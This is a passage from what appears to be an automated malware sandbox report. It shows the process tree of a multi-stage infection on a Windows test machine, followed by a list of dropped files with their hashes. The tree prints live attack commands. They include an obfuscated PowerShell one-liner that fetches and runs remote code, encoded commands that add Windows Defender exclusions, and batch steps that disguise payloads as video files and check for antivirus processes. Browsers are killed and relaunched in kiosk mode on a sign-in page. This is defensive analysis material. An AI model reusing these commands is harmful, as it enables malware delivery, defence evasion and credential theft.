                    C:\Windows\system32\WerFault.exe -u -p 2860 -s 36
                    7⤵
                    • Loads dropped DLL
                    PID:2536
                • C:\Users\Admin\AppData\Local\Temp\10301520101\0484bd06fb.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301520101\0484bd06fb.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1668
                • C:\Users\Admin\AppData\Local\Temp\10301530101\8bd06e6967.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301530101\8bd06e6967.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1212
                • C:\Users\Admin\AppData\Local\Temp\10301540101\79af16a62b.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301540101\79af16a62b.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2816
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM firefox.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1784
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM chrome.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3060
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM msedge.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2876
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM opera.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2472
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM brave.exe /T
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2668
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    7⤵
                      PID:1564
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        8⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:1768
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.0.1683225628\1086728701" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b6df83d-2339-43c1-ac66-979fcf209478} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 1288 107da058 gpu
                          9⤵
                            PID:2564
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.1.415959142\838535773" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00845416-b0ae-4d38-80c1-ff44b5ff3b33} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 1504 d72458 socket
                            9⤵
                              PID:3012
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.2.1059681822\588055629" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21811 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d841a9d4-b7f6-4035-8811-cd9fc409d2f1} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 2104 19ede258 tab
                              9⤵
                                PID:2520
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.3.913005717\2122716824" -childID 2 -isForBrowser -prefsHandle 2824 -prefMapHandle 2820 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {868b6772-3ee6-49e9-b276-241872bd8452} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 2836 1b52a758 tab
                                9⤵
                                  PID:2284
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.4.1402722640\949696457" -childID 3 -isForBrowser -prefsHandle 3900 -prefMapHandle 3928 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae34b16d-8ad3-4c60-8a4d-80a582d5f5aa} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 3960 216b9758 tab
                                  9⤵
                                    PID:784
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.5.836766098\1405969163" -childID 4 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cb70741-2a7f-4747-aa85-45d7bea2d63b} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 4080 1ea52758 tab
                                    9⤵
                                      PID:2692
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.6.978963027\1769470059" -childID 5 -isForBrowser -prefsHandle 4220 -prefMapHandle 4228 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b71832dc-3fc5-4527-8018-9ce09a1b916f} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 4080 216bb858 tab
                                      9⤵
                                        PID:2680
                                • C:\Users\Admin\AppData\Local\Temp\10301550101\ac9a01084e.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10301550101\ac9a01084e.exe"
                                  6⤵
                                  • Modifies Windows Defender DisableAntiSpyware settings
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Modifies Windows Defender TamperProtection settings
                                  • Modifies Windows Defender notification settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2800
                                • C:\Users\Admin\AppData\Local\Temp\10301560101\507fafb18b.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10301560101\507fafb18b.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  • Modifies system certificate store
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3244
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                    7⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:3980
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4de9758,0x7fef4de9768,0x7fef4de9778
                                      8⤵
                                        PID:3988
                                      • C:\Windows\system32\ctfmon.exe
                                        ctfmon.exe
                                        8⤵
                                          PID:960
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:2
                                          8⤵
                                            PID:2816
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:8
                                            8⤵
                                              PID:3156
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:8
                                              8⤵
                                                PID:3164
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2276 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:2500
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:928
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1232 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:2
                                                8⤵
                                                  PID:3768
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1412 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:1
                                                  8⤵
                                                  • Uses browser remote debugging
                                                  PID:3872
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3480 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:8
                                                  8⤵
                                                    PID:3948
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3504 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:8
                                                    8⤵
                                                      PID:3264
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1212,i,17061689325905346073,12252096803508939600,131072 /prefetch:8
                                                      8⤵
                                                        PID:3752
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\d2dba" & exit
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1536
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 11
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:3780
                                                  • C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301570101\wjfOfXh.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3696
                                                  • C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301580101\OkH8IPF.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:3500
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 3500 -s 36
                                                      7⤵
                                                      • Loads dropped DLL
                                                      PID:3536
                                                  • C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2096
                                                    • C:\Users\Admin\AppData\Local\Temp\onefile_2096_133871352575639500\windowscore.exe
                                                      C:\Users\Admin\AppData\Local\Temp\10301590101\weC48Q7.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:2628
                                                  • C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301600101\ARxx7NW.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:3420
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3436
                                                    • C:\Program Files\RuntimeApp\0000013963.exe
                                                      "C:\Program Files\RuntimeApp\0000013963.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:3604
                                                  • C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301610101\tK0oYx3.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:3400
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 3400 -s 36
                                                      7⤵
                                                      • Loads dropped DLL
                                                      PID:3920
                                                  • C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301620101\d3jhg_003.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6812
                                                  • C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301630101\4wAPcC0.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6912
                                                    • C:\Users\Admin\AppData\Roaming\media\svchost.exe
                                                      "C:\Users\Admin\AppData\Roaming\media\svchost.exe"
                                                      7⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:7136
                                                  • C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301640101\zx4PJh6.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1984
                                                    • C:\Windows\SysWOW64\CMD.exe
                                                      "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3660
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        8⤵
                                                        • Enumerates processes with tasklist
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5152
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /I "opssvc wrsa"
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5156
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        8⤵
                                                        • Enumerates processes with tasklist
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5276
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5272
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c md 440824
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5348
                                                      • C:\Windows\SysWOW64\extrac32.exe
                                                        extrac32 /Y /E Architecture.wmv
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5388
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V "Offensive" Inter
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5580
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5616
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5712
                                                      • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                                                        Organizations.com h
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:5760
                                                      • C:\Windows\SysWOW64\choice.exe
                                                        choice /d y /t 5
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5856
                                                  • C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10301650101\50KfF6O.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5984
                                        • C:\Windows\system32\conhost.exe
                                          conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:1464
                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                          1⤵
                                            PID:3104
                                          • C:\Windows\system32\taskeng.exe
                                            taskeng.exe {7767627D-1FA7-4AE8-82D7-B4AAC83DDA5B} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:S4U:
                                            1⤵
                                              PID:6644
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAcAByAEUAZgBFAFIARQBuAEMAZQAgAC0ARQB4AGMAbABVAFMASQBPAE4AcABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAE8AcgBDAGUAOwAgAEEARABEAC0ATQBQAHAAUgBFAEYARQByAEUATgBjAGUAIAAtAEUAeABDAEwAVQBzAEkAbwBuAFAAUgBPAEMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0ARgBvAHIAQwBlAA==
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:6676
                                            • C:\Windows\system32\taskeng.exe
                                              taskeng.exe {1A62EFD0-F59E-4D65-B0A6-AE7FD5E0C531} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                                              1⤵
                                              • Loads dropped DLL
                                              PID:5964
                                              • C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                                C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
                                                2⤵
                                                • Executes dropped EXE
                                                PID:6040

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\ProgramData\d2dba\ieukng

                                              Filesize

                                              96KB

                                              MD5

                                              d367ddfda80fdcf578726bc3b0bc3e3c

                                              SHA1

                                              23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

                                              SHA256

                                              0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

                                              SHA512

                                              40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

                                            • C:\Temp\tbN9MGoDZ.hta

                                              Filesize

                                              779B

                                              MD5

                                              39c8cd50176057af3728802964f92d49

                                              SHA1

                                              68fc10a10997d7ad00142fc0de393fe3500c8017

                                              SHA256

                                              f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                              SHA512

                                              cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                              Filesize

                                              71KB

                                              MD5

                                              83142242e97b8953c386f988aa694e4a

                                              SHA1

                                              833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                              SHA256

                                              d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                              SHA512

                                              bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                              Filesize

                                              344B

                                              MD5

                                              08d5aa98b6c472138a5681c431958b25

                                              SHA1

                                              2321259ecace12e3d74b8e7201ae47a12e8778cb

                                              SHA256

                                              696ed2475fcc4b4477fed4c268118aab3f9565ce3de3b75b5b71dd12c55482e0

                                              SHA512

                                              95a15b47f0537d0a99b475f6571fbb071277cfa9f13b8819222a6b8a2121e5e7bd9a08edce89c25b27e3ad7e80fa969d744dc1b1bca6eee0159b4b523cca59c8

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

                                              Filesize

                                              16B

                                              MD5

                                              aefd77f47fb84fae5ea194496b44c67a

                                              SHA1

                                              dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                              SHA256

                                              4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                              SHA512

                                              b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                              Filesize

                                              264KB

                                              MD5

                                              f50f89a0a91564d0b8a211f8921aa7de

                                              SHA1

                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                              SHA256

                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                              SHA512

